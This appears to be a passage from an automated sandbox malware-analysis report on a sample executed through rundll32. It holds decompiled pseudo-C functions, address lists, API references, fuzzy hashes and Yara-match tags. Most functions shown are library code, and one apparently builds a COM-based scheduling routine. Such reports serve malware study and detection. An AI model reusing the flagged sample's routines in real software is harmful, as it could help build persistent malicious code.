                0x21520616a4d
                0x21520616a56
                0x21520616a5b
                0x21520616a62
                0x21520616a67
                0x21520616a7e

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 12cb753592418e0a759f6f428db5439732c11c79c7618c1f1c891ebc0f29000e
                • Instruction ID: f9f634e1b3cb9c88e4b30256e1bc7aaffa9ca163d74f52b4a5e0cd9fdf72be37
                • Opcode Fuzzy Hash: 12cb753592418e0a759f6f428db5439732c11c79c7618c1f1c891ebc0f29000e
                • Instruction Fuzzy Hash: B711823720AEA1C6FB349F50A4487D9A2A5FFE0380F6840A9FE955779DDB38E810C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D0950 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000215215205D0950(long long __rbx, long long __rcx, long long __rdx, intOrPtr* __r8, intOrPtr* __r9, long long _a16, void* _a24) {
				long long _v32;
				void* __rdi;
				void* __rsi;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t19;
				long long _t23;
				long long _t25;
				long long _t31;
				intOrPtr* _t34;
				void* _t36;

				_t25 = __rcx;
				_t19 = _t36;
				 *((long long*)(_t19 + 0x10)) = __rdx;
				 *((long long*)(_t19 + 8)) = __rcx;
				 *((long long*)(_t19 - 0x28)) = 0xfffffffe;
				 *((long long*)(_t19 + 0x18)) = __rbx;
				_t34 = __r9;
				_t23 = __rcx;
				 *((intOrPtr*)(__rcx + 8)) = 1;
				 *((intOrPtr*)(__rcx + 0xc)) = 1;
				 *((long long*)(__rcx)) = 0x20627b48;
				_t7 = _t25 + 0x10; // 0x10
				_t31 = _t7;
				r8d = 0xa0;
				E00000215215205F8EF0(_t14, 0, _t16, _t17, _t31, __rdx, _t31, __r8);
				_a16 = _t31;
				_v32 = _t31;
				if (_t31 == 0) goto 0x205d09bf;
				r8b =  *_t34;
				_t13 = E00000215215205D0AF8(_t23, _t31,  *__r8, _t31, _t34, __r8); // executed
				return _t13;
			}
















                0x215205d0950
                0x215205d0950
                0x215205d0953
                0x215205d0957
                0x215205d0963
                0x215205d096b
                0x215205d096f
                0x215205d0975
                0x215205d097d
                0x215205d0980
                0x215205d098a
                0x215205d098d
                0x215205d098d
                0x215205d0993
                0x215205d099c
                0x215205d09a1
                0x215205d09a6
                0x215205d09ae
                0x215205d09b0
                0x215205d09b9
                0x215205d09cf

                APIs
                • __ExceptionPtr::__ExceptionPtr.LIBCPMT ref: 00000215205D09B9
                  • Part of subcall function 00000215205D0AF8: EncodePointer.KERNEL32 ref: 00000215205D0BE7
                  • Part of subcall function 00000215205D0AF8: __ExceptionPtr::_CallCopyCtor.LIBCPMT ref: 00000215205D0C31
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$CallCopyCtorEncodePointerPtr::_Ptr::__
                • String ID:
                • API String ID: 1376364169-0
                • Opcode ID: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction ID: 91cf5da75928a7ee87b86f7f983d5330b3186417c4359c28dadfdedd7c2e5131
                • Opcode Fuzzy Hash: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction Fuzzy Hash: 4701D633301B9081D711DF1AE54469DBBA1EB99FF0F298225DEA8477E5DA39C453C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7FB0 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 75%
                			E00007FFA7FFA535E7FB0(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				void* _t8;

				if (__rcx == 0) goto 0x535e7fcf;
				if (0xffffffffffffffe0 - __rdx < 0) goto 0x535e8012;
				_t21 =  ==  ? 0x1 : __rcx * __rdx;
				goto 0x535e7ff6;
				E00007FFA7FFA535EF900();
				if (0x1 == 0) goto 0x535e8012;
				E00007FFA7FFA535EF4E8(0x1,  ==  ? 0x1 : __rcx * __rdx, _t21);
				if (0x1 == 0) goto 0x535e8012;
				 *0x1 =  *0x1 + 0x1; // executed
				if (0x1 == 0) goto 0x535e7fe1;
				goto 0x535e801f;
				_t8 = E00007FFA7FFA535E8380(0x1);
				 *0x1 = 0xc;
				return _t8;
			}





                0x7ffa535e7fbf
                0x7ffa535e7fcd
                0x7ffa535e7fdc
                0x7ffa535e7fdf
                0x7ffa535e7fe1
                0x7ffa535e7fe8
                0x7ffa535e7fed
                0x7ffa535e7ff4
                0x7ffa535e8009
                0x7ffa535e800e
                0x7ffa535e8010
                0x7ffa535e8012
                0x7ffa535e8017
                0x7ffa535e8024

                APIs
                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA535E8B04,?,?,00003C63485C5C92,00007FFA535E8389,?,?,?,?,00007FFA535E7E7D,?,?,?), ref: 00007FFA535E8005
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction ID: a9e670807884ebb764c2cba4b8859986aa21cdf9515bc769ee08227e5fc957a5
                • Opcode Fuzzy Hash: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction Fuzzy Hash: 1AF06D41B2AB0689FE59976258103B9529B5FCAB60F0CF4B0C91EA62D1DE2CE480B220
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7E98 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 37%
                			E00007FFA7FFA535E7E98(void* __rax, void* __rcx) {
				void* __rbx;
				void* _t4;

				if (__rcx - 0xffffffe0 > 0) goto 0x535e7ee3;
				goto 0x535e7eca;
				E00007FFA7FFA535EF900();
				if (0x1 == 0) goto 0x535e7ee3;
				E00007FFA7FFA535EF4E8(0x1, __rcx, __rcx);
				if (0x1 == 0) goto 0x535e7ee3;
				RtlAllocateHeap(??, ??, ??); // executed
				if (0x1 == 0) goto 0x535e7eb5;
				goto 0x535e7ef0;
				_t4 = E00007FFA7FFA535E8380(0x1);
				 *0x1 = 0xc;
				return _t4;
			}





                0x7ffa535e7ea5
                0x7ffa535e7eb3
                0x7ffa535e7eb5
                0x7ffa535e7ebc
                0x7ffa535e7ec1
                0x7ffa535e7ec8
                0x7ffa535e7ed6
                0x7ffa535e7edf
                0x7ffa535e7ee1
                0x7ffa535e7ee3
                0x7ffa535e7ee8
                0x7ffa535e7ef5

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction ID: 4ede43ae513be3baac5debab2facc92d28265a310ba8b1bee03fc949d1967733
                • Opcode Fuzzy Hash: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction Fuzzy Hash: 94F01211F3DB4649FE6497715901279519B9FC6760F0CEAB4DD2EE52C1DE6CA840A120
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520585910 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E0000021521520585910(void* __rax) {
				void* _v424;
				void* _t9;

				E00000215215205F51CC(_t9, __rax);
				asm("lock xadd [0xfdbb0], eax");
				if (1 != 1) goto 0x2058594b;
				__imp__#115(); // executed
				 *0x206834e4 = 2;
				return  *0x206834e4;
			}





                0x2152058591e
                0x21520585928
                0x21520585935
                0x2152058593f
                0x21520585945
                0x21520585952

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Startup_onexit
                • String ID:
                • API String ID: 3012808385-0
                • Opcode ID: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction ID: 491b940f68149e2d30725d8e711c20ff20439202a1d9a9092c7161981e0c9d5c
                • Opcode Fuzzy Hash: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction Fuzzy Hash: 22E04F32542971CAE771EB14D8887D82365BBE4328F900061C51581198DA3DD50ACA00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CB35C Relevance: 1.4, APIs: 1, Instructions: 122stringCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: lstrcmp
                • String ID:
                • API String ID: 1534048567-0
                • Opcode ID: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction ID: 8e4895561d94445850441ec87fe0f5a2b0901914b110194f9fd381edfa507104
                • Opcode Fuzzy Hash: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction Fuzzy Hash: C841B133307D70C7EE288F05E4987A97372FBA0B59F0445A19F4A43649E7B9D8918B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520607C38 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 37%
                			E0000021521520607C38(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x20607c57;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x20607c9a;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x20607c7e;
				if (E0000021521520612620() == 0) goto 0x20607c9a;
				if (E000002152152060AB7C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x20607c9a;
				HeapAlloc(??, ??, ??); // executed
				if (_t22 == 0) goto 0x20607c69;
				goto 0x20607ca7;
				E0000021521520603944(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                0x21520607c38
                0x21520607c47
                0x21520607c4b
                0x21520607c4b
                0x21520607c55
                0x21520607c63
                0x21520607c67
                0x21520607c70
                0x21520607c7c
                0x21520607c8d
                0x21520607c96
                0x21520607c98
                0x21520607c9a
                0x21520607c9f
                0x21520607cac

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocHeap
                • String ID:
                • API String ID: 4292702814-0
                • Opcode ID: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction ID: 7e0b4ad341f30d8d659e6ef839148b97070017b8254770678f063560c677f02b
                • Opcode Fuzzy Hash: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction Fuzzy Hash: 5CF06272783A25C9FE745662545C3EA53927FF4B80F3C84A48D09863C9ED3CE5818110
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520603D7C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 37%
                			E0000021521520603D7C(intOrPtr* __rax, void* __rcx) {
				void* __rbx;

				if (__rcx - 0xffffffe0 > 0) goto 0x20603dc7;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x20603dae;
				if (E0000021521520612620() == 0) goto 0x20603dc7;
				if (E000002152152060AB7C(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0x20603dc7;
				HeapAlloc(??, ??, ??); // executed
				if (__rax == 0) goto 0x20603d99;
				goto 0x20603dd4;
				E0000021521520603944(__rax);
				 *__rax = 0xc;
				return 0;
			}




                0x21520603d89
                0x21520603d93
                0x21520603d97
                0x21520603da0
                0x21520603dac
                0x21520603dba
                0x21520603dc3
                0x21520603dc5
                0x21520603dc7
                0x21520603dcc
                0x21520603dd9

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocHeap
                • String ID:
                • API String ID: 4292702814-0
                • Opcode ID: 956ebdcfed529ac6ad59708b428ade9f6119d3b0c5f61404e33dc8569c27877b
                • Instruction ID: 2a4a7014dd376b8be2d8adce86127680f0155fdf258cfcb600ff0aca4ea9d367
                • Opcode Fuzzy Hash: 956ebdcfed529ac6ad59708b428ade9f6119d3b0c5f61404e33dc8569c27877b
                • Instruction Fuzzy Hash: CCF0E2333ABA72C9FE741672488C3E651866FE47A1F3C0BA05C26452C9DE38A4408510
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00000215205C5490 Relevance: 176.2, APIs: 93, Strings: 7, Instructions: 1227libraryloadermemoryCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Variant$AddressClearInitProcString_com_issue_error$AllocFree$HandleLibraryLoadModule
                • String ID: %04d-%02d-%02dT%02d:%02d:%02d$CoCreateInstance$CoInitializeEx$CoInitializeSecurity$CoUninitialize$Ole32.dll$PT%dM
                • API String ID: 2795092902-3623500657
                • Opcode ID: 3865d6dc0924d9aa26a070cdd8bf88c238a6e570e95cbdf661ebfdf4c434dd41
                • Instruction ID: fd207dbea7ef154283d184571d4e4eb89cf3e9c9ff871448866cc6e322cb5182
                • Opcode Fuzzy Hash: 3865d6dc0924d9aa26a070cdd8bf88c238a6e570e95cbdf661ebfdf4c434dd41
                • Instruction Fuzzy Hash: ECC22633302FA0CAEB659F65D8583DC33A4EBA5B98F148465DE4A5BB99DF38C584C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CB510 Relevance: 84.4, APIs: 36, Strings: 12, Instructions: 411memorycomlibraryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 17%
                			E00000215215205CB510(void* __eax, void* __esi, long long __rbx, char* __rcx, long long __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long long* _t255;
				long long* _t261;
				long long* _t262;
				long long* _t269;
				long long* _t270;
				long long _t279;
				intOrPtr* _t284;
				intOrPtr* _t288;
				void* _t355;
				long long* _t358;
				long long* _t360;
				long long _t362;
				long long _t364;
				signed long long _t366;
				void* _t369;
				short* _t370;
				void* _t372;
				void* _t373;
				void* _t392;
				void* _t395;
				struct HINSTANCE__* _t398;
				WCHAR* _t402;

				_t279 = __rbx;
				 *((long long*)(_t372 + 0x10)) = __rdx;
				_t370 = _t372 - 0x70;
				_t373 = _t372 - 0x170;
				 *((long long*)(_t370 + 0x30)) = 0xfffffffe;
				 *((long long*)(_t373 + 0x1b0)) = __rbx;
				 *((long long*)(_t373 + 0x58)) = __rbx;
				 *((long long*)(_t370 + 0xb8)) = __rbx;
				 *((long long*)(_t373 + 0x20)) = _t373 + 0x58;
				_t9 = _t279 + 1; // 0x1
				r8d = _t9;
				__imp__CoCreateInstance(_t369);
				if (__eax < 0) goto 0x205cb5c0;
				 *((long long*)(_t373 + 0x40)) = _t370 + 0xb8;
				 *((long long*)(_t373 + 0x38)) = __rbx;
				 *((long long*)(_t373 + 0x30)) = __rbx;
				 *((intOrPtr*)(_t373 + 0x28)) = 0;
				 *((long long*)(_t373 + 0x20)) = __rbx;
				r9d = 0;
				r8d = 0;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x58)))) + 0x18))() >= 0) goto 0x205cb5c7;
				_t284 =  *((intOrPtr*)(_t373 + 0x58));
				if (_t284 == 0) goto 0x205cb5c0;
				 *((intOrPtr*)( *_t284 + 0x10))();
				goto 0x205cbb56;
				_t255 =  *0x20683330; // 0x0
				if (_t255 != 0) goto 0x205cb5f7;
				GetModuleHandleW(_t402);
				GetProcAddress(_t398);
				 *0x20683330 = _t255;
				 *((intOrPtr*)(_t373 + 0x38)) = 0;
				 *((long long*)(_t373 + 0x30)) = __rbx;
				 *((intOrPtr*)(_t373 + 0x28)) = 3;
				 *((intOrPtr*)(_t373 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				if ( *_t255() >= 0) goto 0x205cb643;
				_t288 =  *((intOrPtr*)(_t373 + 0x58));
				if (_t288 == 0) goto 0x205cb637;
				 *((intOrPtr*)( *_t288 + 0x10))();
				goto 0x205cb5b5;
				__imp__#2();
				__imp__#2();
				__imp__#2();
				 *((long long*)(_t373 + 0x70)) = __rbx;
				 *((long long*)(_t373 + 0x28)) = __rbx;
				 *((long long*)(_t373 + 0x20)) = _t373 + 0x70;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0x30))();
				 *((long long*)(_t373 + 0x78)) = __rbx;
				 *((long long*)(_t373 + 0x28)) = __rbx;
				 *((long long*)(_t373 + 0x20)) = _t373 + 0x78;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0x30))();
				 *((long long*)(_t373 + 0x68)) = __rbx;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x78)))) + 0x78))();
				 *((long long*)(_t370 - 0x80)) = __rbx;
				 *((long long*)(_t373 + 0x20)) = __rbx;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x70)))) + 0x98))();
				 *((long long*)(_t373 + 0x50)) = __rbx;
				_t261 =  *((intOrPtr*)( *((intOrPtr*)(_t370 - 0x80))));
				 *((intOrPtr*)(_t261 + 0x78))();
				 *((long long*)(_t370 - 0x58)) = __rbx;
				 *((long long*)(_t370 - 0x50)) = __rbx;
				 *((long long*)(_t370 - 0x50)) = 0xf;
				 *((long long*)(_t370 - 0x58)) = __rbx;
				 *((char*)(_t370 - 0x68)) = 0;
				_t367 = _t366 | 0xffffffff;
				if (__rcx == 0) goto 0x205cb75a;
				if ( *__rcx != 0) goto 0x205cb741;
				goto 0x205cb74e;
				if ( *((char*)(__rcx + (_t366 | 0xffffffff) + 1)) != 0) goto 0x205cb744;
				E0000021521520588C10(__rbx, _t370 - 0x68, __rcx, __rcx, _t370, (_t366 | 0xffffffff) + 1);
				__imp__#8();
				 *((short*)(_t370 - 0x30)) = 8;
				_t400 =  >=  ?  *((void*)(_t370 - 0x68)) : _t370 - 0x68;
				E00000215215205F4DCC(_t261, _t370 - 0x30);
				 *((long long*)(_t370 - 0x78)) = _t261;
				if (_t261 == 0) goto 0x205cb7a7;
				 *((long long*)(_t261 + 8)) = _t279;
				 *((intOrPtr*)(_t261 + 0x10)) = 1;
				_t300 =  >=  ?  *((void*)(_t370 - 0x68)) : _t370 - 0x68;
				E00000215215205F6FA0(0, _t279,  >=  ?  *((void*)(_t370 - 0x68)) : _t370 - 0x68, _t366 | 0xffffffff);
				 *_t261 = _t261;
				goto 0x205cb7aa;
				_t358 = _t279;
				 *((long long*)(_t370 - 0x48)) = _t358;
				if (_t358 != 0) goto 0x205cb7be;
				E00000215215205F6F70();
				_t262 =  *_t358;
				 *((long long*)(_t370 - 0x28)) = _t262;
				asm("lock xadd [edi+0x10], eax");
				if (__esi != 1) goto 0x205cb801;
				if ( *_t358 == 0) goto 0x205cb7e2;
				__imp__#6();
				 *_t358 = _t279;
				if ( *((intOrPtr*)(_t358 + 8)) == 0) goto 0x205cb7f4;
				E00000215215205F51EC(_t262, _t279, _t366 | 0xffffffff, _t395);
				 *((long long*)(_t358 + 8)) = _t279;
				E00000215215205F51EC(_t262, _t279, _t366 | 0xffffffff, _t392);
				 *((long long*)(_t370 - 0x48)) = _t279;
				E00000215215205F4DCC(_t262, _t358);
				 *((long long*)(_t370 - 0x70)) = _t262;
				if (_t262 == 0) goto 0x205cb846;
				 *((long long*)(_t262 + 8)) = _t279;
				 *((intOrPtr*)(_t262 + 0x10)) = 1;
				__imp__#2();
				 *_t262 = _t262;
				if (_t262 != 0) goto 0x205cb849;
				E00000215215205F6F70();
				asm("int3");
				_t360 = _t279;
				 *((long long*)(_t370 - 0x40)) = _t360;
				if (_t360 != 0) goto 0x205cb85d;
				E00000215215205F6F70();
				 *((intOrPtr*)(_t373 + 0x20)) = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))) + 0x28))();
				asm("lock xadd [edi+0x10], esi");
				if (__esi != 1) goto 0x205cb8b1;
				if ( *_t360 == 0) goto 0x205cb892;
				__imp__#6();
				 *_t360 = _t279;
				if ( *((intOrPtr*)(_t360 + 8)) == 0) goto 0x205cb8a4;
				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))), _t279, _t366 | 0xffffffff, _t355);
				 *((long long*)(_t360 + 8)) = _t279;
				E00000215215205F51EC( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))), _t279, _t367, _t366);
				 *((long long*)(_t370 - 0x40)) = _t279;
				__imp__#8();
				 *_t370 = 0x13;
				 *((intOrPtr*)(_t370 + 8)) = 0;
				 *((intOrPtr*)(_t373 + 0x20)) = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x68)))) + 0x28))();
				__imp__#8();
				 *((short*)(_t370 + 0x18)) = 0x11;
				 *((char*)(_t370 + 0x20)) = 0;
				 *((intOrPtr*)(_t373 + 0x20)) = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x68)))) + 0x28))();
				__imp__#8();
				 *((short*)(_t370 - 0x18)) = 0xd;
				 *((long long*)(_t370 - 0x10)) =  *((intOrPtr*)(_t373 + 0x68));
				 *((intOrPtr*)(_t373 + 0x20)) = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))) + 0x28))();
				 *((long long*)(_t373 + 0x60)) = _t279;
				 *((long long*)(_t373 + 0x38)) = _t279;
				 *((long long*)(_t373 + 0x30)) = _t373 + 0x60;
				_t269 =  *((intOrPtr*)(_t373 + 0x50));
				 *((long long*)(_t373 + 0x28)) = _t269;
				 *((long long*)(_t373 + 0x20)) = _t279;
				r9d = 0;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0xc0))() >= 0) goto 0x205cb99f;
				goto 0x205cbabd;
				E00000215215205F4DCC(_t269, _t370 - 0x30);
				 *((long long*)(_t370 - 0x70)) = _t269;
				if (_t269 == 0) goto 0x205cb9e0;
				 *((long long*)(_t269 + 8)) = _t279;
				 *((intOrPtr*)(_t269 + 0x10)) = 1;
				__imp__#2();
				 *_t269 = _t269;
				if (_t269 != 0) goto 0x205cb9e3;
				E00000215215205F6F70();
				asm("int3");
				_t362 = _t279;
				 *((long long*)(_t370 - 0x38)) = _t362;
				if (_t362 != 0) goto 0x205cb9f7;
				E00000215215205F6F70();
				_t270 =  *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x60))));
				 *((long long*)(_t373 + 0x28)) = _t279;
				 *((long long*)(_t373 + 0x20)) = _t279;
				r8d = 0;
				E00000215215205C51F0( *((intOrPtr*)(_t270 + 0x20))(), _t279, _t370 - 0x38);
				E00000215215205F4DCC(_t270, _t370 - 0x38);
				 *((long long*)(_t370 - 0x70)) = _t270;
				if (_t270 == 0) goto 0x205cba61;
				 *((long long*)(_t270 + 8)) = _t279;
				 *((intOrPtr*)(_t270 + 0x10)) = 1;
				__imp__#2();
				 *_t270 = _t270;
				if (_t270 != 0) goto 0x205cba64;
				E00000215215205F6F70();
				asm("int3");
				_t364 = _t279;
				 *((long long*)(_t370 - 0x78)) = _t364;
				if (_t364 != 0) goto 0x205cba78;
				E00000215215205F6F70();
				 *((long long*)(_t373 + 0x28)) = _t279;
				 *((long long*)(_t373 + 0x20)) = _t279;
				r8d = 0;
				E00000215215205C51F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x60)))) + 0x20))(), _t279, _t370 - 0x78);
				__imp__#9();
				__imp__#9();
				__imp__#9();
				__imp__#9();
				__imp__#9();
				__imp__#9();
				__imp__#6();
				__imp__#6();
				__imp__#6();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x70)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x78)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x50)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 - 0x80)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x60)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t370 + 0xb8)))) + 0x10))();
				E0000021521520586820( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t373 + 0x58)))) + 0x10))(), 0x8007000e, _t370 - 0x68);
				return  *((short*)(_t370 + 0x40));
			}




























                0x215205cb510
                0x215205cb510
                0x215205cb520
                0x215205cb525
                0x215205cb52c
                0x215205cb534
                0x215205cb541
                0x215205cb546
                0x215205cb552
                0x215205cb560
                0x215205cb560
                0x215205cb56b
                0x215205cb573
                0x215205cb584
                0x215205cb589
                0x215205cb58e
                0x215205cb593
                0x215205cb597
                0x215205cb59c
                0x215205cb59f
                0x215205cb5ae
                0x215205cb5b0
                0x215205cb5b8
                0x215205cb5bd
                0x215205cb5c2
                0x215205cb5c7
                0x215205cb5d1
                0x215205cb5da
                0x215205cb5ea
                0x215205cb5f0
                0x215205cb5f7
                0x215205cb5fb
                0x215205cb600
                0x215205cb608
                0x215205cb610
                0x215205cb613
                0x215205cb625
                0x215205cb627
                0x215205cb62f
                0x215205cb634
                0x215205cb63e
                0x215205cb64a
                0x215205cb65a
                0x215205cb66a
                0x215205cb673
                0x215205cb682
                0x215205cb68c
                0x215205cb691
                0x215205cb694
                0x215205cb69a
                0x215205cb69e
                0x215205cb6ad
                0x215205cb6b7
                0x215205cb6bc
                0x215205cb6bf
                0x215205cb6c5
                0x215205cb6c9
                0x215205cb6dd
                0x215205cb6e0
                0x215205cb6ec
                0x215205cb6f5
                0x215205cb6fb
                0x215205cb701
                0x215205cb70a
                0x215205cb714
                0x215205cb717
                0x215205cb71b
